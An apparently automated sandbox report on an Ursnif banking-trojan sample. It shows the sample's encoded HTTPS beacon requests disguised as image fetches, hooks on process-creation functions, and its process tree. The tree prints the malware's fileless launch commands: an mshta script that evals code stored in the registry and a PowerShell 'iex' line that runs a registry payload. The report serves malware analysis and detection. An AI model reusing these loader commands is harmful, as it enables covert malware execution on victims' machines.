2021-11-23 20:01:39 UTC	408	OUT	GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: www.lycos.com
2021-11-23 20:01:39 UTC	408	IN	HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2021 20:01:39 GMT Server: Apache Content-Security-Policy: frame-ancestors 'self' *.lycos.com X-Powered-By: PHP/7.2.24 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2021-11-23 20:01:39 UTC	408	IN	Data Raw: 33 32 33 65 0d 0a Data Ascii: 323e
2021-11-23 20:01:39 UTC	408	IN	Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 4a 53 20 66 6f 72 20 54 79 70 65 6b 69 74 20 66 6f 6e 74 20 45 6d 62 65 64 64 69 6e 67 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 69 75 65 36 7a 62 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 72 79 7b 54 79 70 65 6b 69 74 2e 6c 6f 61 64 28 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 Data Ascii: <!DOCTYPE html><html><head>... JS for Typekit font Embedding --><script type="text/javascript" src="//use.typekit.net/iue6zbc.js"></script><script type="text/javascript">try{Typekit.load();}catch(e){}</script><meta name="viewport" content="width
2021-11-23 20:01:39 UTC	421	IN	Data Raw: 0d 0a Data Ascii:
2021-11-23 20:01:39 UTC	421	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49820	87.248.118.22	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:39 UTC	421	OUT	GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: mail.yahoo.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 20:01:39 UTC	421	IN	HTTP/1.1 302 Found referrer-policy: origin strict-transport-security: max-age=15552000 x-frame-options: DENY x-omg-env: norrin-blue--istio-production-ir2-75f46f56d5-4npg6 location: https://login.yahoo.com?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif vary: Accept content-type: text/plain; charset=utf-8 content-length: 494
2021-11-23 20:01:39 UTC	422	IN	Data Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 63 68 69 6c 64 2d 73 72 63 20 62 6c 6f 62 3a 3b 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 69 6d 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 6e 71 2f 61 64 73 2f 6d 62 2f 6e 61 74 69 76 65 2f 2a 20 68 74 74 70 73 3a 2f 2f 73 65 72 76 69 63 65 2e 63 6d 70 2e 6f 61 74 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 70 2e 67 69 66 20 68 74 74 70 73 3a 2f 2f 73 6d 65 74 72 69 63 73 2e 61 74 74 2e 63 6f 6d 2f 69 64 20 68 74 74 70 73 3a 2f 2f 64 70 6d 2e 64 65 6d 64 65 78 2e 6e 65 74 2f 69 64 20 68 74 74 70 73 3a 2f Data Ascii: content-security-policy: child-src blob:;connect-src 'self' https://.yimg.com https://.yahoo.com https://s.yimg.com/nq/ads/mb/native/* https://service.cmp.oath.com https://www.yahoo.com/p.gif https://smetrics.att.com/id https://dpm.demdex.net/id https:/
2021-11-23 20:01:39 UTC	424	IN	Data Raw: 78 2d 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 63 68 69 6c 64 2d 73 72 63 20 62 6c 6f 62 3a 3b 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 69 6d 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 6e 71 2f 61 64 73 2f 6d 62 2f 6e 61 74 69 76 65 2f 2a 20 68 74 74 70 73 3a 2f 2f 73 65 72 76 69 63 65 2e 63 6d 70 2e 6f 61 74 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 70 2e 67 69 66 20 68 74 74 70 73 3a 2f 2f 73 6d 65 74 72 69 63 73 2e 61 74 74 2e 63 6f 6d 2f 69 64 20 68 74 74 70 73 3a 2f 2f 64 70 6d 2e 64 65 6d 64 65 78 2e 6e 65 74 2f 69 64 20 68 74 74 70 73 Data Ascii: x-content-security-policy: child-src blob:;connect-src 'self' https://.yimg.com https://.yahoo.com https://s.yimg.com/nq/ads/mb/native/* https://service.cmp.oath.com https://www.yahoo.com/p.gif https://smetrics.att.com/id https://dpm.demdex.net/id https
2021-11-23 20:01:39 UTC	427	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 79 61 68 6f 6f 2e 63 6f 6d 3f 2e 73 72 63 3d 79 6d 26 70 73 70 69 64 3d 31 35 39 36 30 30 30 30 31 26 61 63 74 69 76 69 74 79 3d 6d 61 69 6c 2d 64 69 72 65 63 74 26 2e 6c 61 6e 67 3d 65 6e 2d 55 53 26 2e 69 6e 74 6c 3d 75 73 26 2e 64 6f 6e 65 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6d 61 69 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 25 32 46 64 25 32 46 69 6d 61 67 65 73 25 32 46 55 4c 73 64 50 49 56 61 6f 72 38 74 48 49 4c 6b 25 32 46 30 75 6c 6d 71 62 72 48 36 49 54 6e 4b 76 39 25 32 46 68 6a 75 78 4a 52 74 4c 39 41 6e 71 6a 4d 5f 32 46 39 25 32 46 33 31 4b 51 7a 6c 4a 34 41 25 32 46 52 41 44 6e 5f 32 42 39 4b 37 71 4e 34 4f 49 57 7a 68 71 74 25 32 46 Data Ascii: Found. Redirecting to https://login.yahoo.com?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2F

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49821	212.82.100.140	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:39 UTC	427	OUT	GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: login.yahoo.com
2021-11-23 20:01:39 UTC	428	IN	HTTP/1.1 200 OK X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 0 Age: 0 Pragma: no-cache Expires: 0 Referrer-Policy: origin Cache-Control: no-cache, no-store, must-revalidate set-cookie: AS=v=1&s=MddgKnnU&d=A619e9a23\|UPT70Dj.2SrKaZxt_6HV60TKkEwbZL_ceMxlGQJRnZ6BEhd_n1wEzLOefDF3wvFEVfOlN29BttM_07t9LMl2bynGNNWe8Hy5EAHwzwPgx2Igv601VcFLyupMKno2dZadhOqcz0BGahFCflKWDc.IFUeVD3SOlh.1k3Rp_j9Uc9HUTTeccDFQ9HKCaTEC22V.cvjDYFzgFB_78FUwl3CD5XfVb4Nwq5GJlOfT42zRiI3IlP7l04olNEgCQfrYjMHsqk5UqF9wdHVVj3HUjI1Oram38FoXv96AzJRDqdIhws5pM0y3yyYqj81a3TQfaS7Wcb.rMjySCFljhms.9A75ywLj5Btmnl1ir.U2kb4rgq5ZJFHm1CC_YFCaZOZTswH3p4_T5l9FlvWZ1UztndNSNt88nyt6HlqUhh0jd4Uwih6sB0eqmWwuUgs3PlG8QCjM5WAovBcvJRC7V24xgWNJ_dKos_e5ZyUROAzFlf1H6GyXwFGwgDTnNDAPg0vV_Dwq0shAZuVMCCQux3rVMj5OtfoO3pfPRSRJWtMcEhxrRzwjI15aImGDv.OSno38XjF97vJgEScQ0IQ.TWv26SCosNq71mEL7KnBPWVogyKkIPdIrOjjvvSBllQwyeOnRe3s8EtkFLt_88pe5mqeBiQgVkkfP6X8y8ddZdsDAJ_jCmGzRtpgG1r8B_DGNaxlRDwi64nuR3J1DEc6HVBWdx9HAx6pPcqYGZWMH2yh2x.3GNap04nMVFVzxZcMcAcnOOx4GVN.j4h07q8UTo.h9z0NyBUCXkSoHjVuuv2vf0B6m3NKjaG.AifmxxtA588nnpQRY09snAo1lzE97UAUlWku1w7zGBpUraG8mzQQD.mSmbp9pvNeQymPQsaZuJeemqEaMGZ36xsgLwNBxwvgLGnvEVxZOi8fMPo60SCCBQ7q1xEQgzNo2iYFfDq2CyMGHO1mkjXxpykBUlsdZ5dk331cbvLw8TR1xWOHr4SqgOnYCvEHVRD8zfuKdmLZ8UK5Vk8tsMXlqD1Zg27rMAuc0n_v4QhlmxvAJlLXcXh3amVcAm91YfiOXtDcg_PMUi4Hna0ZfSRKihfshbPfvVCsWCPFpQ6kReO0v3PgMQE-~A; path=/; domain=login.yahoo.com; secure; HttpOnly Content-Type: text/html; charset=utf-8 Content-Length: 41311 Content-Security-Policy: base-uri 'self';child-src 'self' https://login.yahoo.net https://s.yimg.com https://s1.yimg.com;connect-src 'self' https://geo.yahoo.com https://pr.comet.yahoo.com https://ws.progrss.yahoo.com https://udc.yahoo.com https://jsapi.login.yahoo.com;default-src 'self' https://s.yimg.com https://s1.yimg.com https://login.yahoo.net;font-src https://s.yimg.com https://s1.yimg.com;frame-src 'self' https://login.yahoo.net https://s.yimg.com https://s1.yimg.com;img-src 'self' data: https://yahoo.com https://ct.yimg.com https://s.yimg.com https://s1.yimg.com https://tw.yimg.com https://geo.yahoo.com https://socialprofiles.zenfs.com https://.wc.yahoodns.net https://beap-bc.yahoo.com https://ws.progrss.yahoo.com https://log.fc.yahoo.com https://backyard.yahoo.com https://.ah.yahoo.com https://pr-bh.ybp.yahoo.com https://fbcdn.net https://scontent.xx.fbcdn.net https://z-m-scontent.xx.fbcdn.net https://graph.facebook.com https://data.mail.yahoo.com https://platform-lookaside.fbsbx.com;media-src https://.ah.yahoo.com;object-src 'none';report-uri https://csp.yahoo.com/beacon/csp?src=mbr_account;script-src 'unsafe-inline' 'self' https://s.yimg.com https://s1.yimg.com https://query.yahoo.com https://.query.yahoo.com https://y.analytics.yahoo.com https://jsapi.login.yahoo.com https://fc.yahoo.com https://e2e.fc.yahoo.com https://pr.comet.yahoo.com 'nonce-uy3A1C0tOdPfqRc7doAmOzxfHC3nwwxRA3S3FsGm2JyzeuWc' ;style-src * 'unsafe-inline' Vary: Accept-Encoding Date: Tue, 23 Nov 2021 20:01:39 GMT Connection: close Strict-Transport-Security: max-age=15552000 Server: ATS Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" Set-Cookie: A1=d=AQABBKNInWECEO0_t0Obu4dZoYjrfXb16ucFEgEBAQGanmGnYQAAAAAA_eMAAA&S=AQAAAmnMFfQ41Tpl_C-GRQVOYP0; Expires=Thu, 24 Nov 2022 02:01:39 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure; HttpOnly Set-Cookie: A3=d=AQABBKNInWECEO0_t0Obu4dZoYjrfXb16ucFEgEBAQGanmGnYQAAAAAA_eMAAA&S=AQAAAmnMFfQ41Tpl_C-GRQVOYP0; Expires=Thu, 24 Nov 2022 02:01:39 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly Set-Cookie: A1S=d=AQABBKNInWECEO0_t0Obu4dZoYjrfXb16ucFEgEBAQGanmGnYQAAAAAA_eMAAA&S=AQAAAmnMFfQ41Tpl_C-GRQVOYP0&j=WORLD; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure Set-Cookie: B=efqnlepgpqi53&b=3&s=pr; Expires=Thu, 24 Nov 2022 02:01:39 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/ Set-Cookie: GUC=AQEBAQFhnpphp0IlVwUF; Expires=Thu, 24 Nov 2022 02:01:39 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; Secure
2021-11-23 20:01:39 UTC	432	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 22 53 74 65 6e 63 69 6c 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 67 72 69 64 20 6c 69 67 68 74 2d 74 68 65 6d 65 20 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f Data Ascii: <!DOCTYPE html><html id="Stencil" class="no-js grid light-theme "> <head> <meta charset="utf-8"> <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no"/> <meta name="format-detectio
2021-11-23 20:01:39 UTC	436	IN	Data Raw: 72 48 36 49 54 6e 4b 76 39 25 32 46 68 6a 75 78 4a 52 74 4c 39 41 6e 71 6a 4d 5f 32 46 39 25 32 46 33 31 4b 51 7a 6c 4a 34 41 25 32 46 52 41 44 6e 5f 32 42 39 4b 37 71 4e 34 4f 49 57 7a 68 71 74 25 32 46 65 39 70 67 33 71 6f 39 4e 4a 76 44 70 6c 73 4a 79 75 5f 25 32 46 32 42 49 4e 4a 68 69 74 7a 7a 69 49 78 5a 35 46 47 65 33 64 51 73 25 32 46 71 58 4c 45 4a 4d 4c 66 72 71 6c 39 34 25 32 46 70 62 79 6e 76 74 73 44 25 32 46 68 62 63 5a 51 7a 34 72 44 4f 52 63 71 61 32 30 47 4e 57 6d 5f 32 42 25 32 46 41 45 61 52 6a 78 64 76 5a 69 25 32 46 57 4a 6f 44 6a 4c 47 52 47 37 77 4d 4e 66 41 31 30 25 32 46 34 37 4c 64 48 4e 58 31 49 68 70 5f 25 32 46 32 46 35 6f 41 50 43 4b 6e 66 57 25 32 46 4f 58 55 64 30 75 4a 51 39 6c 52 43 45 33 25 32 46 5f 32 42 6b 5f 32 42 6e Data Ascii: rH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2Bn
2021-11-23 20:01:39 UTC	445	IN	Data Raw: 2b 31 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f 64 65 3d 22 2b 39 37 35 22 20 76 61 6c 75 65 3d 22 42 54 22 20 3e 42 68 75 74 61 6e 20 26 23 78 32 30 32 41 3b 28 2b 39 37 35 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f 64 65 3d 22 2b 35 39 31 22 20 76 61 6c 75 65 3d 22 42 4f 22 20 3e 42 6f 6c 69 76 69 61 20 26 23 78 32 30 32 41 3b 28 2b 35 39 31 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f Data Ascii: +1)‬</option> <option role="option" data-code="+975" value="BT" >Bhutan ‪(+975)‬</option> <option role="option" data-code="+591" value="BO" >Bolivia ‪(+591)‬</option> <option role="option" data-co
2021-11-23 20:01:39 UTC	461	IN	Data Raw: 6c 75 65 3d 22 53 49 22 20 3e 53 6c 6f 76 65 6e 69 61 20 26 23 78 32 30 32 41 3b 28 2b 33 38 36 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f 64 65 3d 22 2b 36 37 37 22 20 76 61 6c 75 65 3d 22 53 42 22 20 3e 53 6f 6c 6f 6d 6f 6e 20 49 73 6c 61 6e 64 73 20 26 23 78 32 30 32 41 3b 28 2b 36 37 37 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f 64 65 3d 22 2b 32 35 32 22 20 76 61 6c 75 65 3d 22 53 4f 22 20 3e 53 6f 6d 61 6c 69 61 20 26 23 78 32 30 32 41 3b 28 2b 32 35 32 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e Data Ascii: lue="SI" >Slovenia ‪(+386)‬</option> <option role="option" data-code="+677" value="SB" >Solomon Islands ‪(+677)‬</option> <option role="option" data-code="+252" value="SO" >Somalia ‪(+252)‬</option
2021-11-23 20:01:39 UTC	468	IN	Data Raw: 25 32 46 31 68 61 49 62 6a 59 64 66 62 68 56 41 78 47 6f 25 32 46 38 4b 77 74 47 5f 32 46 71 25 32 46 63 2e 67 69 66 22 20 69 64 3d 22 6d 62 72 2d 66 6f 72 67 6f 74 2d 6c 69 6e 6b 22 20 64 61 74 61 2d 79 6c 6b 3d 22 65 6c 6d 3a 62 74 6e 3b 65 6c 6d 74 3a 66 6f 72 67 6f 74 3b 73 6c 6b 3a 66 6f 72 67 6f 74 3b 6d 6b 65 79 3a 6c 6f 67 69 6e 2d 6c 61 6e 64 69 6e 67 2d 66 6f 72 67 6f 74 22 20 64 61 74 61 2d 72 61 70 69 64 2d 74 72 61 63 6b 69 6e 67 3d 22 74 72 75 65 22 3e 46 6f 72 67 6f 74 c2 a0 75 73 65 72 6e 61 6d 65 3f 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 Data Ascii: %2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif" id="mbr-forgot-link" data-ylk="elm:btn;elmt:forgot;slk:forgot;mkey:login-landing-forgot" data-rapid-tracking="true">Forgotusername?</a> </span> </div> </div> <div class

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFC8BAF521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFC8BAF5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFC8BAF520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFC8BAF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B1A300

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFC8BAF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B1A300

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: FpYf5EGDO9.exe PID: 5556 Parent PID: 3100

General

Start time:	20:58:32
Start date:	23/11/2021
Path:	C:\Users\user\Desktop\FpYf5EGDO9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FpYf5EGDO9.exe"
Imagebase:	0x400000
File size:	299520 bytes
MD5 hash:	2F1743897AFA6F586AE97F53BF55C14E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: mshta.exe PID: 4720 Parent PID: 3352

General

Start time:	20:59:27
Start date:	23/11/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Imagebase:	0x7ff671440000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 4856 Parent PID: 4720

General

Start time:	20:59:29
Start date:	23/11/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
